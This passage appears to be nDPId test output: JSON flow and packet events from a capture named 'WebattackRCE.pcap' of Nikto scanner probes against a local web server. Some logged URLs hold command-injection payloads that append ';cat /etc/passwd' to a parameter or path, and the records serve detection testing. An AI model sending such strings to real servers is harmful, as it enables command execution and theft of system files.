-01088{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277528,"flow_last_seen":1576420277528,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277528,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50626,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/athenareg.php?pass=%20;cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000667)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277534,"flow_last_seen":1576420277534,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277534,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50628,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_packet_id":1,"flow_last_seen":1576420277534,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420277534,"pkt":"AAAAAAAAAAAAAAAACABFAADO4OJAAEAGW0V\/AAABfwAAAcXEH5B2FdgIExVLAoAYAED+wgAAAQEICp1m\/kWdZv5FR0VUIC9jZC1jZ2kvc3NjZF9zdW5jb3VyaWVyLnBsIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDY3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277534,"flow_last_seen":1576420277534,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277534,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50628,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cd-cgi\/sscd_suncourier.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001067)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277535,"flow_last_seen":1576420277535,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277535,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50630,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":1,"flow_last_seen":1576420277535,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277535,"pkt":"AAAAAAAAAAAAAAAACABFAADEalJAAEAG0d9\/AAABfwAAAcXGH5Ak\/VK4qoIqcIAYAED+uAAAAQEICp1m\/kedZv5HR0VUIC9jZ2ktYmluL2hhbmRsZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTA2OSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277535,"flow_last_seen":1576420277535,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277535,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50630,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/handler","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001069)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277536,"flow_last_seen":1576420277536,"flow_idle_time":7440000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277536,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":1,"flow_last_seen":1576420277536,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":1576420277536,"pkt":"AAAAAAAAAAAAAAAACABFAADsKwtAAEAGEP9\/AAABfwAAAcXIH5DuMhPiKIF7BYAYAED+4AAAAQEICp1m\/kidZv5IR0VUIC9jZ2ktYmluL2hhbmRsZXIvbmV0c29uYXI7Y2F0IC9ldGMvcGFzc3dkfD9kYXRhPURvd25sb2FkIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDcwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01105{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277536,"flow_last_seen":1576420277536,"flow_idle_time":7440000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277536,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/handler\/netsonar;cat \/etc\/passwd|?data=Download","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001070)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277537,"flow_last_seen":1576420277537,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277537,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50634,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_packet_id":1,"flow_last_seen":1576420277537,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277537,"pkt":"AAAAAAAAAAAAAAAACABFAADIaaFAAEAG0ox\/AAABfwAAAcXKH5CUxlF4c7zrSYAYAED+vAAAAQEICp1m\/kmdZv5JR0VUIC9jZ2ktYmluL3dlYmRpc3QuY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEwNzEpDQoNCg=="} 
-01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277537,"flow_last_seen":1576420277537,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277537,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50634,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/webdist.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001071)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277538,"flow_last_seen":1576420277538,"flow_idle_time":7440000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420277538,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50636,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00682{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_packet_id":1,"flow_last_seen":1576420277538,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1576420277538,"pkt":"AAAAAAAAAAAAAAAACABFAADL1l9AAEAGZct\/AAABfwAAAcXMH5AhiO62DmMqh4AYAED+vwAAAQEICp1m\/kqdZv5KR0VUIC9EQjRXZWIvMTAuMTAuMTAuMTA6MTAwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEwNzIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277538,"flow_last_seen":1576420277538,"flow_idle_time":7440000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420277538,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50636,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/DB4Web\/10.10.10.10:100","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001072)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277540,"flow_last_seen":1576420277540,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277540,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50638,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_packet_id":1,"flow_last_seen":1576420277540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420277540,"pkt":"AAAAAAAAAAAAAAAACABFAADPftlAAEAGvU1\/AAABfwAAAcXOH5DRSkY\/0jWbSIAYAED+wwAAAQEICp1m\/kydZv5MR0VUIC9ld3MvZXdzL2FyY2hpdGV4dF9xdWVyeS5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDczKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01074{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277540,"flow_last_seen":1576420277540,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277540,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50638,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ews\/ews\/architext_query.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001073)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277543,"flow_last_seen":1576420277543,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277543,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50640,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":1,"flow_last_seen":1576420277543,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277543,"pkt":"AAAAAAAAAAAAAAAACABFAADI031AAEAGaLB\/AAABfwAAAcXQH5AqpOuTqUte6oAYAED+vAAAAQEICp1m\/k+dZv5OR0VUIC9leGVjL3Nob3cvY29uZmlnL2NyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDc0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277543,"flow_last_seen":1576420277543,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277543,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50640,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/exec\/show\/config\/cr","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001074)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277544,"flow_last_seen":1576420277544,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277544,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50642,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_packet_id":1,"flow_last_seen":1576420277544,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420277544,"pkt":"AAAAAAAAAAAAAAAACABFAADPHndAAEAGHbB\/AAABfwAAAcXSH5BxSyag9dSEBYAYAED+wwAAAQEICp1m\/lCdZv5QR0VUIC9pbnN0YW50d2VibWFpbC9tZXNzYWdlLnBocCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTA3NSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277544,"flow_last_seen":1576420277544,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277544,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50642,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/instantwebmail\/message.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001075)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277546,"flow_last_seen":1576420277546,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277546,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50644,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_packet_id":1,"flow_last_seen":1576420277546,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277546,"pkt":"AAAAAAAAAAAAAAAACABFAADZI0FAAEAGGNx\/AAABfwAAAcXUH5D0qBvWdLImZ4AYAED+zQAAAQEICp1m\/lGdZv5RR0VUIC9jZmRvY3Mvc25pcHBldHMvZ2V0dGVtcGRpcmVjdG9yeS5jZm0gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEwNzYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01084{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277546,"flow_last_seen":1576420277546,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277546,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50644,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/snippets\/gettempdirectory.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001076)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277547,"flow_last_seen":1576420277547,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277547,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50646,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00690{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_packet_id":1,"flow_last_seen":1576420277547,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1576420277547,"pkt":"AAAAAAAAAAAAAAAACABFAADT6e9AAEAGUjN\/AAABfwAAAcXWH5DaBdEHtMEbgIAYAED+xwAAAQEICp1m\/lOdZv5TR0VUIC9kb3N0dWZmLnBocD9hY3Rpb249bW9kaWZ5X3VzZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTA5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
-01076{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277547,"flow_last_seen":1576420277547,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277547,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50646,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/dostuff.php?action=modify_user","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001091)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277549,"flow_last_seen":1576420277549,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277549,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50648,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
